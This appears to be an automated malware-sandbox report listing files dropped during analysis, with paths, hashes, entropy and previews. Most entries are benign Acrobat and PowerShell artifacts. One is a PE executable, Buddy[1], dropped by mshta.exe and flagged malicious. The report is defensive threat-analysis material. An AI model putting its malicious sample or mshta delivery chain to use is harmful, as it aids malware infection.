                                                                                                                                                                                                        Preview:{"analyticsData":{"responseGUID":"f2e03136-47ea-48df-9d5f-f706c1aad918","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1734968647781,"statusCode":200,"surfaceID":"DC_Reader_Sign_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Sign_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_0","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"266234d2-130d-426e-8466-c7a061db101f","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Sign_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IlVwZ3JhZGVSSFBSZHJBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkVhc2lseSBmaWxsIGFuZCBzaWduIFBERnMuIn0sInRjYXRJZCI6bnVsbH0=","dataType":"app

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Upsell_Cards

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):286
                                                                                                                                                                                                        Entropy (8bit):5.258919639583401
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:6:YEQXJ2HXGy8XDGq7WsGiIPEeOF0Y09lxoAvJfshHHrPeUkwRe9:YvXKXGy8XDGPsdTeOU9wGUUUkee9
                                                                                                                                                                                                        MD5:A47FC724A700BC4A6F3BDAD6FFB0C325
                                                                                                                                                                                                        SHA1:A9832AE42A064CE4213F9ADE4CD9CA31EC1CC1B2
                                                                                                                                                                                                        SHA-256:35BE7BF342247FD725A0EF7A1B515683B7D566A0376CDF9DD981809EDDA274FE
                                                                                                                                                                                                        SHA-512:F0E224EC6158869FA9F8EE644BEB768276E9D274831AC84E9309320919059A4A70AF72A2EAAD2EC4D7FD106B65F2CAE56F67CC78C5F475DF3E93EBDCEED348FB
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:{"analyticsData":{"responseGUID":"f2e03136-47ea-48df-9d5f-f706c1aad918","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1734968647781,"statusCode":200,"surfaceID":"DC_Reader_Upsell_Cards","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\Edit_InApp_Aug2020

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):282
                                                                                                                                                                                                        Entropy (8bit):5.282585867281923
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:6:YEQXJ2HXGy8XDGq7WsGiIPEeOF0Y09lxoAvJTqgFCrPeUkwRe9:YvXKXGy8XDGPsdTeOU9wGTq16Ukee9
                                                                                                                                                                                                        MD5:407EA09490C86467CF82F84047FECD7C
                                                                                                                                                                                                        SHA1:31E679E9B1BEA38DF70E04A7744AD016E7D446FB
                                                                                                                                                                                                        SHA-256:B01AECBC07F6714BF4D662E930FD54BF5572EAE064BCA0F7BEEBCFAB6F2FA85A
                                                                                                                                                                                                        SHA-512:A380275DEA225074774A89B26963358146A99A6DA40E45C647A61126E6DB522A33F46A5D3E5461390B2FB397DA8CB2A5F4BC10853CFF71B979C5450971A22B95
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:{"analyticsData":{"responseGUID":"f2e03136-47ea-48df-9d5f-f706c1aad918","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1734968647781,"statusCode":200,"surfaceID":"Edit_InApp_Aug2020","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\TESTING

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):4
                                                                                                                                                                                                        Entropy (8bit):0.8112781244591328
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:e:e
                                                                                                                                                                                                        MD5:DC84B0D741E5BEAE8070013ADDCC8C28
                                                                                                                                                                                                        SHA1:802F4A6A20CBF157AAF6C4E07E4301578D5936A2
                                                                                                                                                                                                        SHA-256:81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
                                                                                                                                                                                                        SHA-512:65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:....

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\SOPHIA.json

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):2814
                                                                                                                                                                                                        Entropy (8bit):5.130021350755881
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:YqfggilC5OnlhskL7bWy+EBl7i0Kth90b:5gzYYnlh1Td91W/m
                                                                                                                                                                                                        MD5:1DBD7E14AD6882A5C7D0E8C3920DCCA4
                                                                                                                                                                                                        SHA1:903E7EECD8E6F2657F43D0E45F93548C8F572CBF
                                                                                                                                                                                                        SHA-256:CD69B9FD42A94F6DCE3E81A52DB5593E3C82F0B4E5932A7B914C6311285E473A
                                                                                                                                                                                                        SHA-512:EFD15AC69E7A386BE471F5C2702757831B19D7E2ED69516291FF3B688D13101B8BE6DD65C77435BE7BC1E0ACB4F3B01F4E76E7D417CF7BDE3A8D2988B3F11CDF
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:{"all":[{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"668bd32e1cfb454dc37e8bb527748d94","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size":295,"ts":1734793951000},{"id":"DC_Reader_Sign_LHP_Banner","info":{"dg":"5ac7fae807c1534225087e1f23612a2e","sid":"DC_Reader_Sign_LHP_Banner"},"mimeType":"file","size":1090,"ts":1734793951000},{"id":"DC_Reader_Convert_LHP_Banner","info":{"dg":"7567322278ca1ad63372476191559163","sid":"DC_Reader_Convert_LHP_Banner"},"mimeType":"file","size":1123,"ts":1734793951000},{"id":"DC_Reader_Disc_LHP_Retention","info":{"dg":"6603a2952a49ded97dae64ebfdbdde29","sid":"DC_Reader_Disc_LHP_Retention"},"mimeType":"file","size":292,"ts":1734793951000},{"id":"DC_Reader_More_LHP_Banner","info":{"dg":"20d3526c631370da2357ed4cf96d14d4","sid":"DC_Reader_More_LHP_Banner"},"mimeType":"file","size":289,"ts":1734793951000},{"id":"DC_Reader_Edit_LHP_Banner","info":{"dg":"7b75bb8e9b935bf03210cc9da1c50d2d","sid":"DC_Reader_Edit_LHP_Banner"},"mimeType":"file","

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 25, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 25
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):12288
                                                                                                                                                                                                        Entropy (8bit):1.452354871903879
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:TGufl2GL7msCvrBd6dHtbGIbPe0K3+fDy2ds0flKD:lNVmsw3SHtbDbPe0K3+fDZdU
                                                                                                                                                                                                        MD5:0CD1DEC45A1E07B0DB4DBB18DA914DE7
                                                                                                                                                                                                        SHA1:523A41FAFDED226D509E2A3EAAB8693443F534D6
                                                                                                                                                                                                        SHA-256:1006614815743011572232E2BD98B81C92C4CC19661D9C0A9DFEC0056CD7BA22
                                                                                                                                                                                                        SHA-512:C00EEBDDC39120B5E559D321ACDEBDB08C0D9A1E16735C11113F38C82F4D2431D9A968735C53C43DF23D6A5CB663E864F610869B40C9180AF2C747575CD5F339
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................c.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents-journal

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                        File Type:SQLite Rollback Journal
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):8720
                                                                                                                                                                                                        Entropy (8bit):1.9587029285564888
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:7MtrvrBd6dHtbGIbPe0K3+fDy2ds0WOqFl2GL7msP:7g3SHtbDbPe0K3+fDZdlKVmsP
                                                                                                                                                                                                        MD5:5BDC5F0C65D5A327DF99C67122AA7B5F
                                                                                                                                                                                                        SHA1:34EB93B6DDDFEDF6E9C1E2D999CE1523603D9DBB
                                                                                                                                                                                                        SHA-256:7A9C77637637A775C1EC166BBC4762C31A7135E4BD21811BC7EBF7D3109069A4
                                                                                                                                                                                                        SHA-512:5B34BF97DFD1683B7B7D8A3947882E28C5466C1DE4D8A050EBE5B2E87295E6B3D4EBE8762E34C11F233B1F5CD4E32305920616932414ACBFDEB8DF414DE3753D
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:.... .c.......`......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................v.../.././././....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\UserCache64.bin

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):66726
                                                                                                                                                                                                        Entropy (8bit):5.392739213842091
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:768:RNOpblrU6TBH44ADKZEgLia++hI2rgP2OkVzuJ5NKPMOYyu:6a6TZ44ADELia+MI2kP2fsOK
                                                                                                                                                                                                        MD5:FF1575954889EA3058D149985285C79F
                                                                                                                                                                                                        SHA1:0C4FA291902D023CDDA195B1984251C31FF22255
                                                                                                                                                                                                        SHA-256:01B85B4A2C99C513FA60954815D5203AA1CA7B1FF4475ED534C236FB9C4D37A1
                                                                                                                                                                                                        SHA-512:F45DE90F5771DBF2464AC4FF69221A1C228D59E1052D2BC6268DC827477B9C031CEE3C345F8A5A0BF60DC7E499FEE52BF50B3E7A2FCE0B7B35D7F0A472DE68C3
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:4.397.90.FID.2:o:..........:F:AgencyFB-Reg.P:Agency FB.L:$.........................."F:Agency FB.#.96.FID.2:o:..........:F:AgencyFB-Bold.P:Agency FB Bold.L:%.........................."F:Agency FB.#.84.FID.2:o:..........:F:Algerian.P:Algerian.L:$..........................RF:Algerian.#.95.FID.2:o:..........:F:ArialNarrow.P:Arial Narrow.L:$.........................."F:Arial Narrow.#.109.FID.2:o:..........:F:ArialNarrow-Italic.P:Arial Narrow Italic.L:$.........................."F:Arial Narrow.#.105.FID.2:o:..........:F:ArialNarrow-Bold.P:Arial Narrow Bold.L:%.........................."F:Arial Narrow.#.118.FID.2:o:..........:F:ArialNarrow-BoldItalic.P:Arial Narrow Bold Italic.L:%.........................."F:Arial Narrow.#.77.FID.2:o:..........:F:ArialMT.P:Arial.L:$.........................."F:Arial.#.91.FID.2:o:..........:F:Arial-ItalicMT.P:Arial Italic.L:$.........................."F:Arial.#.87.FID.2:o:..........:F:Arial-BoldMT.P:Arial Bold.L:$.........................."F:Arial.#.100.FID.2

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\Buddy[1]

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):472046
                                                                                                                                                                                                        Entropy (8bit):6.33972973882996
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:6144:1+WoC/IdkUP25u+WoC/IdkUP253+WoC/IdkUP25r+WoC/IdkUP25v+WoC/IdkUPS:1pOk6pOkTpOkPpOkzpOk
                                                                                                                                                                                                        MD5:2B73D7181E25B3D60E4F9B5D306D08DF
                                                                                                                                                                                                        SHA1:825FE749BFABD41E6162084A09DB41C81697E311
                                                                                                                                                                                                        SHA-256:37BA0AB729B76B0924C319C52B63C1027AACCAB3B46F013474652FD82128BFC6
                                                                                                                                                                                                        SHA-512:8F1C212F4C51D92CB9B1504EA4E7BBA01E6B268331D9F488F38DF296ECF51A10F4B0FA56DD6E96703CDE965846B59E8DB4D89DFC38BBF0F81DAF66834C739790
                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 29%
                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........R...3...3...3...C...3...C...3...C...3...C...3...3...2...C...3...Cw..3...C...3..Rich.3..........................PE..L...........................T....................@.......................................@...... ..........................P$..,....`..(....................p.......1..T............................................ ..L.......@....................text...X........................... ..`.data...............................@....idata..D)... ...*..................@..@.didat.......P.......4..............@....rsrc...(....`.......6..............@..@.reloc.......p.......B..............@..B................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):64
                                                                                                                                                                                                        Entropy (8bit):0.34726597513537405
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:Nlll:Nll
                                                                                                                                                                                                        MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                                                                                                                        SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                                                                                                                        SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                                                                                                                        SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:@...e...........................................................

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\MSI24ac3.LOG

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):246
                                                                                                                                                                                                        Entropy (8bit):3.5085442896850614
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K8dqOlWKCH:Qw946cPbiOxDlbYnuRKIRw
                                                                                                                                                                                                        MD5:EC61E15C8E388C23F99BF04C9C27D598
                                                                                                                                                                                                        SHA1:EF6883F7297F287EE5CE325BEDF9387A60559D60
                                                                                                                                                                                                        SHA-256:7C8624B5304F19C5EB70A2FE9CD79D803C56D2AD2B41E87FAF9484B153D2B08D
                                                                                                                                                                                                        SHA-512:AAA75AD3933167C66CEA35F24ED6EFA8F52EB900EDFDCE8923161372A034541292EFFF9A6B0E8B00EFB9D68361E3675371723E0B896A254C971927EF7CD8C9E4
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:..E.r.r.o.r. .2.7.1.1...T.h.e. .s.p.e.c.i.f.i.e.d. .F.e.a.t.u.r.e. .n.a.m.e. .(.'.A.R.M.'.). .n.o.t. .f.o.u.n.d. .i.n. .F.e.a.t.u.r.e. .t.a.b.l.e.......=.=.=. .L.o.g.g.i.n.g. .s.t.o.p.p.e.d.:. .2.1./.1.2./.2.0.2.4. . .0.9.:.0.2.:.3.3. .=.=.=.....

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1oy4r1kd.rkt.psm1

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5fm22fcu.zt1.ps1

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_akkit1s2.50b.psm1

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ehwgi4af.gf0.ps1

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ldlobcbu.k0f.ps1

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_w1itqhj1.rqd.psm1

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2024-12-21 09-02-26-492.log

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (393)
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):16525
                                                                                                                                                                                                        Entropy (8bit):5.386483451061953
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:A2+jkjVj8jujXj+jPjghjKj0jLjmF/FRFO7t75NsXNsbNsgNssNsNNsaNsliNsTY:AXg5IqTS7Mh+oXChrYhFiQHXiz1W60ID
                                                                                                                                                                                                        MD5:F49CA270724D610D1589E217EA78D6D1
                                                                                                                                                                                                        SHA1:22D43D4BB9BDC1D1DEA734399D2D71E264AA3DD3
                                                                                                                                                                                                        SHA-256:D2FFBB2EF8FCE09991C2EFAA91B6784497E8C55845807468A3385CF6029A2F8D
                                                                                                                                                                                                        SHA-512:181B42465DE41E298329CBEB80181CBAB77CFD1701DBA31E61B2180B483BC35E2EFAFFA14C98F1ED0EDDE67F997EE4219C5318CE846BB0116A908FB2EAB61D29
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:SessionID=f1c78126-6a87-4f56-987d-4547733fd5ac.1696492435808 Timestamp=2023-10-05T09:53:55:808+0200 ThreadID=6044 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=f1c78126-6a87-4f56-987d-4547733fd5ac.1696492435808 Timestamp=2023-10-05T09:53:55:809+0200 ThreadID=6044 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=f1c78126-6a87-4f56-987d-4547733fd5ac.1696492435808 Timestamp=2023-10-05T09:53:55:809+0200 ThreadID=6044 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=f1c78126-6a87-4f56-987d-4547733fd5ac.1696492435808 Timestamp=2023-10-05T09:53:55:809+0200 ThreadID=6044 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=f1c78126-6a87-4f56-987d-4547733fd5ac.1696492435808 Timestamp=2023-10-05T09:53:55:809+0200 ThreadID=6044 Component=ngl-lib_NglAppLib Description="SetConfig:

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6.log

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (393), with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):15114
                                                                                                                                                                                                        Entropy (8bit):5.348317567782316
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:zD1qNvwfrY1jwmwdAWc95ufLX22Ry5VVvQWiUQ0Onwj5DdJpB2NITkTmHe8jsJhV:vsc
                                                                                                                                                                                                        MD5:8AEFB3736F4434401215E6D45489B59E
                                                                                                                                                                                                        SHA1:100F595CC5E426A2C15E0BD4CF327695246EB183
                                                                                                                                                                                                        SHA-256:32486006895360D2F4D325A328EBC36BC4E9D97D30826D6458BCE6CA8362A0B1
                                                                                                                                                                                                        SHA-512:A3D5466492380E6E5DF843CCC31C748CECA683291F1892C82C7F221CB02F0B08BBA49D16C857BB14E0DE6CC85F900D0894ECE45EADB4C02093681E1F3824A60E
                                                                                                                                                                                                        Malicious:false
